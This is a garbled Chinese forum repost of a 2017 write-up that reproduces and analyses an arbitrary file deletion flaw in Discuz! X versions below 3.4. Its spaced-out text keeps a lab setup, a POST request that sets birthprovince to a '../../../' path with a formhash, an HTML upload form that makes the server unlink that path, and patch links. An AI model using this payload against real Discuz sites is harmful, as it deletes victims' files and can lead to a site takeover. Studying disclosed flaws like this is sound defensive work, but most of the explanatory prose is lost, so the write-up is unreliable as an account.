[11865] 2017-10-07_Discuz!任意文件删除漏洞重现及分析

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2017-10-07_Discuz!任意文件删除漏洞重现及分析 D i s c u z !   L S A   F r e e B u f   2 0 1 7 - 1 0 - 0 7 0 x 0 0   9 2 9 D i s c u z 2 0 1 4 w o o y u n d i s c u z 0 x 0 1   D i s c u z   <   3 . 4 0 x 0 2   w i n 7 + p h p s t u d y + d i s c u z 3 . 2 i m p o r t a n t f i l e . t x t - f o r m h a s h h t t p : / / 1 0 . 0 . 2 . 1 5 : 8 9 9 9 / d i s c u z 3 _ 2 / h o m e . p h p ? m o d = s p a c e c p & a c = p r o f i l e f o r m h a s h b 2 1 b 6 5 7 7 访 1 0 . 0 . 2 . 1 5 : 8 9 9 9 / d i s c u z 3 _ 2 / h o m e . p h p ? m o d = s p a c e c p & a c = p r o f i l e & o p = b a s e P o s t b i r t h p r o v i n c e = . . / . . / . . / i m p o r t a n t f i l e . t x t & p r o f i l e s u b m i t = 1 & f o r m h a s h = b 2 1 b 6 5 7 7 便 i m p o r t a n t f i l e . t x t i m p o r t a n t f i l e . t x t 0 x 0 3   h t t p s : / / g i t e e . c o m / C o m s e n z D i s c u z / D i s c u z X / c o m m i t / 7 d 6 0 3 a 1 9 7 c 2 7 1 7 e f 1 d 7 e 9 b a 6 5 4 c f 7 2 a a 4 2 d 3 e 5 7 4 u n l i n k 0 x 0 4   u p l o a d / s o u r c e / i n c l u d e / s p a c e c p / s p a c e c p _ p r o f i l e . p h p < f o r m   a c t i o n = h t t p : / / 1 0 . 0 . 2 . 1 5 : 8 9 9 9 / d i s c u z 3 _ 2 / h o m e . p h p ? m o d = s p a c e c p & a c = p r o f i l e & o p = b a s e   m e t h o d = P O S T   e n c t y p e = m u l t i p a r t / f o r m - d a t a > < i n p u t   t y p e = f i l e   n a m e = b i r t h p r o v i n c e   i d = f i l e   / > < i n p u t   t y p e = t e x t   n a m e = f o r m h a s h   v a l u e = b 2 1 b 6 5 7 7 / > < / p > < i n p u t   t y p e = t e x t   n a m e = p r o f i l e s u b m i t   v a l u e = 1 / > < / p > < i n p u t   t y p e = s u b m i t   v a l u e = S u b m i t   / > < / f r o m >
7 0 1 2 2 0 2 2 8 u n l i n k k e y ] s p a c e s p a c e [ b i r t h p r o v i n c e ] b i r t h p r o v i n c e p o s t b i r t h p r o v i n c e - > - > u n l i n k - > 0 x 0 5   d i s c u z 2 0 1 4 使 使 0 x 0 6   h t t p s : / / w w w . s e e b u g . o r g / v u l d b / s s v i d - 9 6 6 0 8 h t t p s : / / w w w . s e e b u g . o r g / v u l d b / s s v i d - 9 3 5 8 8 h t t p s : / / g i t e e . c o m / C o m s e n z D i s c u z / D i s c u z X / c o m m i t / 7 d 6 0 3 a 1 9 7 c 2 7 1 7 e f 1 d 7 e 9 b a 6 5 4 c f 7 2 a a 4 2 d 3 e 5 7 4 h t t p s : / / g i t e e . c o m / C o m s e n z D i s c u z / D i s c u z X / b l o b / 7 d 6 0 3 a 1 9 7 c 2 7 1 7 e f 1 d 7 e 9 b a 6 5 4 c f 7 2 a a 4 2 d 3 e 5 7 4 / u p l o a d / s o u r c e / i n c l u d e / s p a c e c p / s p a c e c p _ p r o f i l e . p h p * L S A F r e e B u f . C O M i f ( s u b m i t c h e c k ( p r o f i l e s u b m i t ) )   {

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则